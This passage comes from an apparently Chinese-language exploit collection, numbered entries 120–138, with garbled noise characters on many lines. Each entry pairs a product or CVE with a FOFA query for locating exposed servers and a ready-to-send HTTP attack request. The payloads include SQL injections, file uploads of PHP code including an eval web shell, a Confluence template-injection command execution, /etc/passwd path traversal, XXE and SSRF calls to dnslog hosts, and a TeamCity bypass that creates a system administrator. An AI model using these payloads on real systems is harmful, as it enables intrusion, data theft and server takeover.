4 v8 o6 j0 g7 p1 C, U& a! z$ p4 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0! A- N, v: m$ F. u
Accept: */*6 ]4 b5 @# _4 A2 I2 x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 C5 J" w1 K; e* a& eAccept-Encoding: gzip, deflate" H# k# ~  i) q" S+ J
Content-Type: application/x-www-form-urlencoded;
3 [' N- u* k% U- \7 GContent-Length: 1092 N+ F* d1 _/ @! X: w% e* d$ N
Origin: https://58.18.133.60:8443
0 p  z' O" n# q/ ~; E' W" t3 mReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php6 p3 e& }1 ?  j- y6 _, q# U
Sec-Fetch-Dest: empty. }9 L$ c* ^" e4 `8 A" p3 ]
Sec-Fetch-Mode: cors) O2 M4 {+ y/ |. M
Sec-Fetch-Site: same-origin
& B2 U1 H+ I# O' J  A, o! RX-Forwarded-For: 1.1.1.1
+ x& m& S, i. ~0 ^& FX-Originating-Ip: 1.1.1.1( C  s8 l* |3 x
X-Remote-Ip: 1.1.1.1' `" {& D1 M/ @
X-Remote-Addr: 1.1.1.1) P# @$ a9 ^4 t/ k1 C/ c$ h& Q% v
Te: trailers
8 L0 b0 {8 }% I# `6 t1 o# ?. ZConnection: close7 Y: E; j; Z) |4 b+ G: K! M

( t2 O9 u" F9 r0 @src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
$ P2 Y& h) F/ W* ], O' e* C- n! G4 G  P
& R9 _3 n. i; |# V3 |
120. 北京百绰智能S40管理平台导入web.php任意文件上传4 u, J4 D2 x% X
CVE-2024-1253
& h1 s5 |. Z8 d5 MFOFA:title="Smart管理平台"- o/ A5 ?2 l, ~  a5 }9 f2 n
POST /useratte/web.php? HTTP/1.1" ?$ p+ ]2 g/ V$ D" f) d. ]) w
Host: ip:port2 n6 i1 X! j5 n$ c4 v
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db! n; ?( P( V/ s- R
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko) h8 z( X* D6 `* I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- d1 p* O5 p" S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ b. \- @5 u% W* A, IAccept-Encoding: gzip, deflate
% T# L* O8 ]/ gContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328; Y" P) Y4 L: W) g
Content-Length: 597  T* ^+ t* u3 F' y! G/ m( }; q% o( P
Origin: https://ip:port
4 T! w7 r. ^) ~Referer: https://ip:port/sysmanage/licence.php
. k7 [! F! {7 YUpgrade-Insecure-Requests: 1
8 _- G/ S+ I6 d7 n% I  BSec-Fetch-Dest: document
0 C) _( w. X- kSec-Fetch-Mode: navigate
# g- a0 A& q) ^6 ]3 Y" E' G6 Y; }# [Sec-Fetch-Site: same-origin2 Y) R* x# c. F5 F; |: ^
Sec-Fetch-User: ?12 n' W# a3 ]5 k
Te: trailers
9 g+ R# Y; J7 r% `/ qConnection: close, X4 ]/ o' X2 r
9 Z6 h6 j  U7 P: ~
-----------------------------42328904123665875270630079328% `0 H; w# r2 ?
Content-Disposition: form-data; name="file_upload"; filename="2.php"5 M' a; t6 U3 _+ D* ]3 b
Content-Type: application/octet-stream# n% O2 I! K+ ]

' ^+ u" x' C/ l/ E0 r2 K; ~" `<?php phpinfo()?>4 f  g& n+ n( ^9 x  v* E+ T
-----------------------------42328904123665875270630079328
( u% L$ A+ |) M  v* \Content-Disposition: form-data; name="id_type"7 ]+ [. s$ ?4 J$ H8 s) `# O' ?

; H! E# y( i  ]5 E/ P0 Q- o' W. {1
" h6 L# H! g* n-----------------------------42328904123665875270630079328
! p# O! H9 ~0 ?. J2 r% r$ R: XContent-Disposition: form-data; name="1_ck"
0 E8 L" v9 l; {2 A1 d0 H9 b! ^: y( ?# {  E! t1 X) @& b
1_radhttp) P3 c2 U4 Z8 A
-----------------------------423289041236658752706300793286 p4 ?& ^* N5 ]! P
Content-Disposition: form-data; name="mode"
8 |$ G( e3 x" y# B. N8 l0 d% e  K: |) r
import: I( s6 k( N' h5 a
-----------------------------42328904123665875270630079328
+ a7 K3 y: s& Z$ T9 ?! z$ N) [& V0 f- L  `! F% X4 B$ ]6 x
8 ?# Q, g& [) W: v' @
文件路径/upload/2.php
4 G6 z# d  W" K& Q: J3 ?6 w, m: K. d( [5 a+ e5 p0 j3 z2 k
121. 北京百绰智能S42管理平台userattestation.php任意文件上传# r/ [8 @: B; p. P( A
CVE-2024-1918
  m* A( m& T9 i. a0 o* _FOFA:title="Smart管理平台"
! C! i, \' o6 j; QPOST /useratte/userattestation.php HTTP/1.1
9 _% X6 h7 O0 N* X) P! LHost: 192.168.40.130:8443
1 I+ K. R, Q3 H7 a0 s  S7 D3 r/ NCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50; N, O2 q9 L7 G7 z- O
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
- g' a1 m5 P6 K( \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 R# T- E7 l$ m) t1 g) JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( g1 @: i! I9 G, I3 v0 G( x" ^6 KAccept-Encoding: gzip, deflate
$ `) `, G# R6 [/ D, j* v0 n. u; B" RContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
8 @% y7 x, `) v1 ~$ XContent-Length: 592
2 Q  ]9 @) d" h1 u) Q/ k, L3 COrigin: https://192.168.40.130:8443  m0 U. B1 M! _- y( h9 g
Upgrade-Insecure-Requests: 1
, L" k: F% g3 uSec-Fetch-Dest: document
, \# M" k4 I  }* E2 n; T+ @Sec-Fetch-Mode: navigate. D- C) S; n! r" m- ^1 C' Q, v' C
Sec-Fetch-Site: same-origin
, R. p0 z4 m' w8 M* GSec-Fetch-User: ?1* P  Z. a# i3 i4 Z, ?
Te: trailers/ Z+ h7 H* M! W! r4 l- t# B6 r# D: H
Connection: close3 y+ @, T0 [$ ]

5 ?# S1 `: H7 ]/ u9 B" B5 H-----------------------------42328904123665875270630079328
( f8 E6 G8 ^" J7 g  S1 ?+ xContent-Disposition: form-data; name="web_img"; filename="1.php"
. W" {! J' }+ tContent-Type: application/octet-stream& M" W7 {# t# k! e
& H, N! `9 E' i' K
<?php phpinfo();?>' P7 E' P9 Q2 x* V$ E( K9 Z2 s
-----------------------------42328904123665875270630079328
% @, C/ V9 i% T) ^5 n; O$ ~6 uContent-Disposition: form-data; name="id_type"3 V) i0 \9 T. z) I* [6 |1 @
" f/ E3 d0 M3 p- C8 b' {* A, E
1( @, B4 i* w- H, _% r; X
-----------------------------42328904123665875270630079328+ A5 f6 ]& A+ \* o( Q/ e! `
Content-Disposition: form-data; name="1_ck"
4 ?. }; X' Q+ m+ t! h* b  y. r% X4 [/ f8 O% S! Q) v
1_radhttp
0 ]2 s1 d1 U: T1 ~8 u-----------------------------423289041236658752706300793287 H% C- h4 V4 }
Content-Disposition: form-data; name="hidwel"
( A; J3 u* J/ C: [' h
4 i# b; ]# I. J* U" `set
% P% N0 Z3 f9 e/ J0 r3 K8 y/ u0 }4 j-----------------------------42328904123665875270630079328* l' |0 h7 B) B5 Y) z! ?/ r& m, T: H

$ }8 i7 ?3 [' R$ g- U  R- E$ p6 i& p6 C6 W+ G
boot/web/upload/weblogo/1.php
( Y2 z% I  Z) d. J
. p( [9 p5 j$ k+ m! M* t+ b122. 北京百绰智能s200管理平台/importexport.php sql注入5 g8 f7 M% J  r' @9 s# x9 J0 X
CVE-2024-27718FOFA:title="Smart管理平台"
: Y( b4 l7 [( x0 F3 I: t: }其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()" u0 E: B3 y2 v6 s( f: v  \$ |
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
( ]/ ^1 D$ q5 r* u' [Host: x.x.x.x
& ]$ Z2 f# {0 L- rCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0+ |. ?: V! o2 T% @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0# @6 L9 i( O& o% [  _" h; z* Y9 P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( N* Q0 J4 H9 PAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ \! F1 x: @( ]3 `Accept-Encoding: gzip, deflate, br( I% k) A. L* C' l/ D1 c( b
Upgrade-Insecure-Requests: 17 y& a. _- w; L! E! C* o/ z8 z
Sec-Fetch-Dest: document; W3 f, Z3 `; t5 w& i5 F% A4 [
Sec-Fetch-Mode: navigate
: W% p0 g+ E9 [; M5 k. NSec-Fetch-Site: none9 \% t3 Z& |0 u/ w4 I
Sec-Fetch-User: ?11 g& s$ X% d' `# S4 f
Te: trailers
* B* ?" o6 u8 D7 ^& EConnection: close
) o$ y# @/ n' s, m$ M4 {8 p9 o3 Y- G6 i6 H+ g, k" P
/ o' |8 {) _9 F, I
123. Atlassian Confluence 模板注入代码执行8 K" r, q0 x/ X9 t0 q% ^0 F
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"8 ~8 S' \# T# y8 J. n5 c. a+ R) p0 W
POST /template/aui/text-inline.vm HTTP/1.1; H" c2 N% ]3 a+ w. X# E
Host: localhost:8090( P, X5 E7 d$ U: H6 a
Accept-Encoding: gzip, deflate, br: T3 S' b! F+ q! R% N2 f& b
Accept: */*
; `* ~* x. ?. M8 q) f' J& S: \& a* LAccept-Language: en-US;q=0.9,en;q=0.85 w3 c. ~7 M( b- @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.365 Y" B+ O* |* V# F) L6 d7 U
Connection: close
" d3 ?9 W! J* UContent-Type: application/x-www-form-urlencoded
' z7 ~5 h. K! N$ j, v$ T5 A
# _; l& B$ t4 X- t$ }label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
3 h% e8 i, |8 s. A% f0 m
; i/ u- y1 [5 ?0 @  H' K& q6 n5 }# c
) H$ p! r3 ]* ?% q( @& O; K8 x* r124. 湖南建研工程质量检测系统任意文件上传9 d/ P* _1 z5 X/ D( i* q
FOFA:body="/Content/Theme/Standard/webSite/login.css"
) q3 ^0 b% b" OPOST /Scripts/admintool?type=updatefile HTTP/1.18 s% e( i$ h. h2 H% h5 Q+ H; N. i
Host: 192.168.40.130:8282
; Y1 I! q3 r, K8 o- @2 UUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
- s  r" U7 Y+ Y$ c$ hContent-Length: 72! ]5 i8 V  m; \& o2 P# ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.81 K* Q/ }8 B# x0 O: v- s9 z
Accept-Encoding: gzip, deflate, br# X9 j- ^3 h! ]" [( z% }
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% [$ r; `. d8 a# ~4 ]1 k
Connection: close
* C' X, u& N* YContent-Type: application/x-www-form-urlencoded7 I5 V, e# Y  X& Q5 R5 L

8 h4 r" c- k  }% FfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
, g& Y. g3 [  f) ~8 I. E! n8 L" m4 g9 r! D
# j, l6 V" a+ Z' ]  u: G3 w
http://192.168.40.130:8282/Scripts/abcgcg.aspx* ~( y0 ?* c5 w

* D2 m; O5 Q  ^1 j5 {7 v125. ConnectWise ScreenConnect身份验证绕过
6 i6 o$ H9 h) ~( }+ h, ]3 A9 @/ I3 qCVE-2024-1709
  i9 S# y1 {4 V4 Y# ?/ `FOFA:icon_hash="-82958153"
, v6 j$ o. Y+ _https://github.com/watchtowrlabs ... bypass-add-user-poc
  l6 y/ R$ P: `# J' B$ _# t5 ^* V! }( A

. D8 i& k; C: z3 i# J使用方法  Q- J* a' T1 U6 g% Z9 S* L4 M
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!, P7 e& |( k4 e, m- x, |

% ^. {9 l, g' R5 i  i7 @7 `8 a0 P1 l
创建好用户后直接登录后台,可以执行系统命令。
& ^7 T5 ?9 v" F. P4 {" ^
& M7 N9 ~8 W' e7 F7 M* e126. Aiohttp 路径遍历7 p, x; Q: R1 H  |1 W5 i4 l
FOFA:title=="ComfyUI"
7 z& O! {. U0 i) h" B+ fGET /static/../../../../../etc/passwd HTTP/1.12 y' _- ~0 t' B+ Z3 V) p
Host: x.x.x.x
" K9 I* h" M2 L/ @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
8 ?! c) D4 R. C4 z9 e, xConnection: close, [( c) l7 o! }' ^1 h
Accept: */*' a4 q  n6 e  S7 h
Accept-Language: en
" F- n# G: c7 }& h; TAccept-Encoding: gzip1 ~8 a- ^) {3 f! @. E

! |+ h7 |& H1 g8 ^2 ^* j! c
1 X' F7 A3 `$ @3 L" p127. 广联达Linkworks DataExchange.ashx XXE. b/ b: I8 o+ c, @* c' Q/ Y
FOFA:body="Services/Identification/login.ashx" , g3 A7 B  {' ]  z& ^* m
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.16 X/ Q& ^2 J6 m! B
Host: 192.168.40.130:8888
' \+ K6 J" k, U5 k$ V* OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
+ q7 ^. t7 l5 N( CContent-Length: 415: a4 p. y; O# ~. [$ J: y0 b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& i! y$ `) b) ^, ]
Accept-Encoding: gzip, deflate/ P+ x) F$ T; j% P* x. `( I4 T1 b
Accept-Language: zh-CN,zh;q=0.9
) A6 \* q% H5 ^- WConnection: close
2 T$ i" V3 t% k0 PContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
; O- \) x2 }7 D8 t4 mPurpose: prefetch- a' W0 H: |+ D7 R8 I/ p
Sec-Purpose: prefetch;prerender$ _; \6 W; [; q7 D. N: R

1 Y( D* b6 W" g( a% u& t------WebKitFormBoundaryJGgV5l5ta05yAIe00 h" d/ {& T5 e3 x4 v) {% P
Content-Disposition: form-data;name="SystemName"
& @# [! i8 }7 d. r; |$ Y+ h
# ~1 U, F# ^0 Y+ ?8 ?; W! V, H& X  ~BIM
7 _. _. `; m9 x+ G" k2 Q6 q" ?------WebKitFormBoundaryJGgV5l5ta05yAIe0
" g, t  C7 L) n# {. rContent-Disposition: form-data;name="Params"
" x/ g. V& _) [- ?9 @Content-Type: text/plain
- \# }9 ^; h0 I! P! [
) M; X+ g3 M* i9 t' K- O<?xml version="1.0" encoding="UTF-8"?>
+ T0 @$ O- C/ h/ D6 G. J8 u6 f- b<!DOCTYPE test [: ]8 L" ~& j+ u" U& C' I. b
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">7 s  v5 y  s1 |% \$ U. R
]
+ r/ G/ F" ^) T3 d! T" J* j>4 x4 H5 ?* y9 D5 U8 x2 S
<test>&t;</test>
: g7 K) L2 m+ z9 Z------WebKitFormBoundaryJGgV5l5ta05yAIe0--
  u; B- Z- M* b$ k% B/ X
: ?& F% I4 s2 _& y  S: g) k; W% \: r  _# B$ V2 j

& ~0 q6 K4 j8 |' d5 T  }8 _128. Adobe ColdFusion 反序列化
; [% f9 B( [5 ~& I# MCVE-2023-38203
# ^; ~' n) V# F9 y2 B% S: V, U+ e; k& J/ CAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)% W8 p, E% ?  E) `! T
FOFA:app="Adobe-ColdFusion"1 [% r# I5 b" {7 Y( l9 J4 A: k
PAYLOAD7 w) ?. u* g- q

1 H- W5 h, P$ T/ }0 a129. Adobe ColdFusion 任意文件读取0 A3 |3 x' Q& U) @- x. ]$ S) Q
CVE-2024-207671 F# B4 x# A; I8 P
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
9 C( J1 g( ]$ m, g$ I! Q; _第一步,获取uuid% H& a, I! J' N- i( T! x. ?
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
/ G, h8 {9 F6 ^( T" c  F% SHost: x.x.x.x1 v$ z* S0 Y8 G- q$ T* X9 a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36, {: H& p, [3 T" o! M/ ?
Accept: */*9 r" z+ [7 F3 P% @
Accept-Encoding: gzip, deflate& F( T& m( D) M+ p% U! I
Connection: close
- {  ?( Q) P  E% o- A0 t6 ]0 ^5 Z' k6 N+ N) \3 S

) |, x7 p2 X7 l5 z第二步,读取/etc/passwd文件
3 {4 W) `' V0 ^! mGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
8 A" p. C5 f: s7 p: E& u+ |0 r. HHost: x.x.x.x2 P( j( [) _0 i( F& ^, e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
0 h/ D; g1 g6 J9 x8 N$ ^4 HAccept: */*
2 z3 ?6 H5 U1 t7 e8 f4 s2 l" nAccept-Encoding: gzip, deflate6 b  }  H6 n7 r( T# q- b4 q7 |
Connection: close4 z$ t8 A/ u9 Z/ @: a+ r& |
uuid: 85f60018-a654-4410-a783-f81cbd5000b9
1 B6 w* U8 f5 N. x9 F' [( y( P6 K$ G3 d9 _# O- [
+ R. k3 @* m  G  |5 B5 D+ c; u
130. Laykefu客服系统任意文件上传
' M! t, v. m0 r) c3 {, c; aFOFA:icon_hash="-334624619"  w" d) v7 i4 @- i* `! j8 a
POST /admin/users/upavatar.html HTTP/1.12 L4 \9 _. t) t% H/ P% b2 C. T6 I
Host: 127.0.0.12 x- J/ z0 o1 [+ W* j% i2 E
Accept: application/json, text/javascript, */*; q=0.01
: d7 A( |5 a3 i, u7 PX-Requested-With: XMLHttpRequest
3 H8 w6 t! |- Q1 |- ~User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
( i; o  f5 l7 n( b8 ^4 b, @6 F+ S: aContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
, G$ u- U) [$ d% `$ xAccept-Encoding: gzip, deflate) p8 H% e/ B& f! v, \: U) G
Accept-Language: zh-CN,zh;q=0.91 w6 P2 Z& ?" _* J" \9 `
Cookie: user_name=1; user_id=3
$ l. z; \. N1 p: W/ T. V" N  e! hConnection: close, V5 a2 |/ h$ w4 e

' R$ D/ t6 I1 F------WebKitFormBoundary3OCVBiwBVsNuB2kR( V" [! R0 f5 s6 X0 S
Content-Disposition: form-data; name="file"; filename="1.php"' R5 a/ `/ [  o9 }* @6 {& F/ u
Content-Type: image/png9 Z$ i$ }7 G" }& ~1 {4 K! g

% R- k$ U# T9 \; W<?php phpinfo();@eval($_POST['sec']);?>7 ^+ a+ ^! `) i, B: f
------WebKitFormBoundary3OCVBiwBVsNuB2kR--% y8 l0 E; Q& _) P

" K) \: |; ?/ g8 L5 U4 e
; K3 A- r2 R5 n131. Mini-Tmall <=20231017 SQL注入
- f& z6 f% Y* ~. P, d5 b3 wFOFA:icon_hash="-2087517259"
4 F6 M2 L. S' x. f后台地址:http://localhost:8080/tmall/admin
2 F% C2 P$ K) o+ i, Q4 l0 nhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
- ?$ L( P' k8 h7 t- v+ Z
6 X( @2 q$ k9 i& i1 `5 u8 E7 O132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过; s1 {' W3 u+ D& U2 u
CVE-2024-27198
' r* ?, x; j& mFOFA:body="Log in to TeamCity") r+ V) N$ ?5 V) A7 G
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
! s% u* G. P8 E, U  R+ BHost: 192.168.40.130:8111
. H7 N  y8 @1 O( i3 k1 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36# \' m/ J6 y2 f; Y, j: }' @% N; d5 a0 p
Accept: */*
( ?7 \0 q( s/ Z+ ZContent-Type: application/json& \6 @* n* w, D2 }* n6 Y9 P
Accept-Encoding: gzip, deflate/ `0 u/ {1 n8 C
8 B. s' X- C& o& g
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}/ u6 m. C0 ^8 T

, d: C' J% T$ j. X5 x7 E; K- R* O# J% n; t8 }# F8 ]  {- ^
CVE-2024-27199
2 n+ G0 C. @2 ~9 t, V/res/../admin/diagnostic.jsp) o! W0 y! \8 J, n& X: k9 W$ Z9 Z
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/ O3 Y: {' ^( E2 L, i2 Y/update/../admin/diagnostic.jsp
7 }; Z. t+ {3 T6 T2 s& \# Q7 l6 u, X2 H) s9 U' x& T

2 ]4 Z+ w  O1 N! ~/ g7 qCVE-2024-27198-RCE.py3 L* g* v1 ~3 D9 m
. H8 ?& ~+ E9 E
133. H5 云商城 file.php 文件上传
$ }: G8 a, p5 j0 I5 gFOFA:body="/public/qbsp.php"
, e; J" d3 }* P4 CPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1
- {( u3 S8 o$ h0 w# ^. Y# C/ yHost: your-ip. m- c; A" c* t8 S# I: J* ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36! Z9 z/ h. ?! {$ r
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
! R# F3 B6 Q; m% ~9 U$ u) z% t+ C& _/ _( `9 [. a% A
------WebKitFormBoundaryFQqYtrIWb8iBxUCx2 R! j, g$ l% p+ O! `6 x+ j
Content-Disposition: form-data; name="file"; filename="rce.php"' n) Y8 F& d+ k
Content-Type: application/octet-stream
2 Q- X- V1 h& V- F
- l/ h8 m" d( S8 C0 g<?php system("cat /etc/passwd");unlink(__FILE__);?>( J/ _3 G3 X* I6 a+ K
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--) V4 ]. q* ^; q) y; R' N0 B8 d2 ]
. P8 g/ }0 B3 U7 t( j" P
# L- C) d8 h, t  Y5 i

# ]+ X8 ?5 @; L* n* a134. 网康NS-ASG应用安全网关index.php sql注入
! ?5 I1 n' `" }CVE-2024-2330/ m* P; s  {1 X4 |+ ]
Netentsec NS-ASG Application Security Gateway 6.3版本
6 @- ]" h* o7 |& E/ m, w- X. j% JFOFA:app="网康科技-NS-ASG安全网关"# @2 O; g1 O" q, e/ c
POST /protocol/index.php HTTP/1.1. i+ U* q3 a  S8 q' F
Host: x.x.x.x, h6 @; X' I1 Q$ o0 {  S; {
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de, G* ]1 A6 z4 f: W7 J' V# P- F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0  d6 J6 K( k/ \- k
Accept: */*1 J9 c9 t5 A4 u5 q5 K. p# J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" ^  x! {+ F' A( o- oAccept-Encoding: gzip, deflate
3 l/ m) a# f6 j. u, tSec-Fetch-Dest: empty
( Y; T7 J8 \1 C  x3 E# b: T( ]Sec-Fetch-Mode: cors
2 G6 k" r3 |) C& i& NSec-Fetch-Site: same-origin
# z( c" J7 s. m* bTe: trailers
% O3 D0 ^0 C% S9 R& rConnection: close
, m% m9 _# c6 D  ^Content-Type: application/x-www-form-urlencoded6 a9 b! X" E- C: J9 |( I( G. K' G. Y/ u7 v
Content-Length: 263& _$ _9 F8 X5 ^

* P  j1 T+ g4 e5 J4 P" R5 bjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}$ u4 B8 n: }' z% _" X1 J* V3 _
: e/ {. d. _" u7 l4 l& A
9 j3 p8 A2 x9 D2 N+ O
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入& W) I- M/ |( [% }& \+ e! [
CVE-2024-2022
* k+ U1 s! s3 `: M/ XNetentsec NS-ASG Application Security Gateway 6.3版本: p1 A5 ?, Y( k: x( J
FOFA:app="网康科技-NS-ASG安全网关"9 d5 b5 O1 V. ]/ e7 b+ `* l3 u+ l& }/ H
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
, z/ _. v% x4 rHost: x.x.x.x
1 L  o4 ]# u5 N* _/ {# p1 Y; NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
/ j/ q3 ?8 ?. s  |9 `; KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 V7 ^% |8 ]+ m% L- t
Accept-Encoding: gzip, deflate' S6 w! B( j/ g6 v  W
Accept-Language: zh-CN,zh;q=0.94 y' T/ x  e; T. [* Z0 C. ]
Connection: close
- J7 x& \0 C: H4 r% N) N1 `
3 n" G* s6 P5 k0 [" }5 O: c" ?- u/ O. G$ ]8 V$ r% u
136. NextChat cors SSRF
6 p( R2 Q9 `/ _5 b$ Y1 ECVE-2023-49785
/ j8 A5 b7 y( ]FOFA:title="NextChat"6 k; y" ]$ u" q  d4 U* h
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
( P5 C2 E) u9 }% t6 l% k% _Host: x.x.x.x:10000* L2 d: I, K$ o; W# Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
" a# w' o5 b' P$ xConnection: close
& d- O+ U1 |& n% i  Y: OAccept: */*
5 {1 W5 p5 E2 x$ v- RAccept-Language: en
& h" y' E  l, yAccept-Encoding: gzip
0 o3 Z9 L! O, j( F7 S
- |$ X4 x8 J) Z2 S7 C& y! t% a1 h# d  c, v
137. 福建科立迅通信指挥调度平台down_file.php sql注入6 c) J4 I) c) N3 ], Z$ X9 r
CVE-2024-2620$ ^- m, }0 U! s, T, H
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"2 i7 z; t* s4 A0 G, f  ^5 n
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
6 ?' j7 X$ B2 o' @& THost: x.x.x.x4 @! Y6 k; M" P; k1 ^9 `) y" b4 M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.04 W$ z0 m/ ]+ R& X% V3 c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( N0 g: C* F4 i) \4 d3 v* t; rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 j) ^  X1 H) V0 s/ l7 NAccept-Encoding: gzip, deflate, br
5 H+ u+ y! }) k* K2 U( h7 SConnection: close' W) V' h- P+ r8 G
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj2 Q. ^7 T6 Q$ j
Upgrade-Insecure-Requests: 1
) ~2 a: B; `; ]5 X- }' _" ^! c, ^, z! y- P( c# M% N
+ O4 e9 A/ z  B1 C4 b" p- x
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入2 {/ W, y% g. G! T4 ]" r8 N
